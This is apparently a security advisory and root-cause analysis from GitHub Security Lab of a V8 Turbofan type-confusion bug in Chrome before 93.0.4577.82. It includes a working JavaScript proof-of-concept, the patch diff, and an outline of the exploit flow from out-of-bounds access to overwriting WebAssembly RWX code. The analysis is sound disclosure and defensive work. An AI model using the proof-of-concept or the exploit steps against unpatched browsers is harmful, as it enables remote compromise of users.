Man Yue Mo, GitHub Security Lab

The Basics

Disclosure or Patch Date: 13 September 2021

Product: Google Chrome

Advisory: https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop.html

Affected Versions: pre 93.0.4577.82

First Patched Version: 93.0.4577.82

Issue/Bug Report: https://bugs.chromium.org/p/chromium/issues/detail?id=1247763

Patch CL: https://source.chromium.org/chromium/_/chromium/v8/v8.git/+/6391d7a58d0c58cd5d096d22453b954b3ecc6fec

Bug-Introducing CL: N/A

Reporter(s): Anonymous

The Code

Proof-of-concept:

function store(y) {
  x = y;
}

function load() {
  return x.b;
}

var x = {a : 1};
var x1 = {a : 2};
var x2 = {a : 3};
var x3 = {a : 4};

store(x1);
%PrepareFunctionForOptimization(store);
store(x2);

x1.b = 1;

%OptimizeFunctionOnNextCall(store);
store(x2);

x.b = 1;

%PrepareFunctionForOptimization(load);
load();

%OptimizeFunctionOnNextCall(load);
load();

store(x3);

%DebugPrint(load());

Exploit sample: N/A

Did you have access to the exploit sample when doing the analysis? N/A

The Vulnerability

Bug class: Type confusion

Vulnerability details: Optimized code that stores global properties does not get deoptimized when the property map changed, leading to type confusion.

Prior to the patch, when Turbofan compiles code for storing global properties that has the kConstantType attribute (i.e. the storage type has not changed), it inserts DependOnGlobalProperty (1. below) and CheckMaps (2. below) to ensure that the property store does not change the map of the property cell:

     case PropertyCellType::kConstantType: {
        ...
        dependencies()->DependOnGlobalProperty(property_cell);         //<------------ 1.
        ...
        if (property_cell_value.IsHeapObject()) {
          MapRef property_cell_value_map =
              property_cell_value.AsHeapObject().map();
          if (property_cell_value_map.is_stable()) {
            dependencies()->DependOnStableMap(property_cell_value_map);
          } else {
            ... //<----- fall through
          }
          // Check that the {value} is a HeapObject.
          value = effect = graph()->NewNode(simplified()->CheckHeapObject(),
                                            value, effect, control);
          // Check {value} map against the {property_cell_value} map.
          effect = graph()->NewNode(                                //<------------ 2.
              simplified()->CheckMaps(
                  CheckMapsFlag::kNone,
                  ZoneHandleSet<Map>(property_cell_value_map.object())),
              value, effect, control);

However, when the map of the global property (property_cell_value_map) is changed inplace after the code is compiled, the optimized code generated by the above only deoptimizes when property_cell_value_map is stable. So for example, if a function store is optimized when the map of the global property x is unstable:

function store(y) {
  x = y;
}

Then an inplace change to the map of x will not deoptimize the compiled store:

x.newProp = 1;   //<------ x now has new map, but the optimized store still assumed it had an old map

This causes the map for x in the optimized store function to be inaccurate. Another function load can now be compiled to access newProp from x:

function load() {
  return x.newProp;
}

The optimized load will assume x to have a new map with newProp as a property.

If the optimized store is now used to store an object with the old map back to x, the next time load is called, a type confusion will occur because load still assumes x has the new map.

Patch analysis:

@@ -804,6 +804,12 @@
       return NoChange();
     } else if (property_cell_type == PropertyCellType::kUndefined) {
       return NoChange();
+    } else if (property_cell_type == PropertyCellType::kConstantType) {
+      // We rely on stability further below.
+      if (property_cell_value.IsHeapObject() &&
+          !property_cell_value.AsHeapObject().map().is_stable()) {
+        return NoChange();
+      }
     }
   } else if (access_mode == AccessMode::kHas) {
     DCHECK_EQ(receiver, lookup_start_object);
@@ -922,17 +928,7 @@
         if (property_cell_value.IsHeapObject()) {
           MapRef property_cell_value_map =
               property_cell_value.AsHeapObject().map();
-          if (property_cell_value_map.is_stable()) {
-            dependencies()->DependOnStableMap(property_cell_value_map);
-          } else {
-            // The value's map is already unstable. If this store were to go
-            // through the C++ runtime, it would transition the PropertyCell to
-            // kMutable. We don't want to change the cell type from generated
-            // code (to simplify concurrent heap access), however, so we keep
-            // it as kConstantType and do the store anyways (if the new value's
-            // map matches). This is safe because it merely prolongs the limbo
-            // state that we are in already.
-          }
+          dependencies()->DependOnStableMap(property_cell_value_map);
 
           // Check that the {value} is a HeapObject.
           value = effect = graph()->NewNode(simplified()->CheckHeapObject(),

After the patch, the JIT compiler will bail out when property_cell_type is kConstantType and property_cell_value_map is unstable. This ensures that optimized code for storing global properties will be deoptimized if the map of the property cell changed.

Thoughts on how this vuln might have been found (fuzzing, code auditing, variant analysis, etc.):

While the affected code itself differs from the runtime behaviour (as seen from the comment), it is not obvious that it is a problem. Even after seeing the release notes and realizing that this is an exploitable issue, it took a good few hours for me to figure out how this can be exploited, which is not always possible for every piece of code.

It may also be possible to find this type of bugs using fuzzing, seeing the simplicity of the proof-of-concept that I included. The main complication is perhaps the need for two optimized functions to interact, and for the optimization to happen in the exact right place. The ingredients required (optimization of multiple functions and having multiple objects in different stages of the transition tree) for generating this type of test cases is somewhat similar to that of CVE-2020-16009, so perhaps similar fuzzing techniques can be applied to both cases.

(Historical/present/future) context of bug:

This bug is in the intersection between the map transition/deprecation and property access, (in particular, field tracking) mechanisms, both are fairly complex with various vulnerabilities found in the past. For example:

Some vulnerabilities in property access:

Some vulnerabilities in map transition/deprecation:

The Exploit

(The terms exploit primitive, exploit strategy, exploit technique, and exploit flow are defined here.)

Exploit strategy (or strategies):

The proof-of-concept included is already capable of causing out-of-bounds access in Javascript. To exploit the bug more readily, Javascript array can be used instead of Javascript objects, which would lead to a type confusion between arrays of different element types and cause out-of-bounds access in Javascript arrays. Once that is achieved, the exploit is fairly standard. I've written an article with more details of the exploit strategy.

Exploit flow:

The exploit follows the standard flow for V8 exploits:

  1. Uses the initial relative read/write primitive to construct an absolute read/write primitive by corrupting a TypedArray object.
  2. Uses the absolute read/write primitive to overwrite the body of a WebAssembly function, which is stored in an RWX region, with the payload.
  3. Calls the WASM function.

Known cases of the same exploit flow: Virtually all V8 exploits in the past 5 years.

Part of an exploit chain?

This is unclear to me as I do not have any context information other than what is publicly available. However, judging from the release notes, where a sandbox escape bug that is also believed to be exploited in the wild (CVE-2021-30633) was patched and was reported on the same day also by someone who wished to remain anonymous, it seems likely that both bugs are used in an exploit chain to fully compromised Chrome.

The Next Steps

Variant analysis

Areas/approach for variant analysis (and why):

As this vulnerability is closely related to how field type is used in property access, an obvious source of possible variants is to check if ordinary property access ("named property" access) also suffers similar problems. As it turns out, instead of using property cell, ordinary property access ("named property" access) uses the field map in property descriptors for map inference. Although it is possible to optimize code with unstable field map in property descriptors and use it to store named properties (similar to the store function that is optimized for this bug), it does not seem to be possible to change the field map in a property descriptor without reassigning the property, which would deoptimize the function. As such, I was not able to trigger similar problems with named property access. This, however, does indicate some inconsistencies in the treatment of field map between property descriptors and property cell, with the field map in property cell always syncing with that of the actual property value, while the field map in property descriptors may not. As such, care must be taken not to mix the use of these two when accessing properties in the JIT compiler. At the time of writing, property cell only seems to be used for global property access, while I am unable to compile JIT code that access global property with property descriptors, due to access check requirement for global properties and the fact that global object uses dictionary map. If these change in the future or unexpected ways to access global properties using property descriptors in JIT compiled code is found, then these cases should be examined carefully to avoid similiar type of bugs.

Found variants: N/A

Structural improvements

What are structural improvements such as ways to kill the bug class, prevent the introduction of this vulnerability, mitigate the exploit flow, make this type of vulnerability harder to exploit, etc.?

Ideas to kill the bug class:

Ideas to mitigate the exploit flow:

Other potential improvements:

0-day detection methods

What are potential detection methods for similar 0-days? Meaning are there any ideas of how this exploit or similar exploits could be detected as a 0-day?

Other References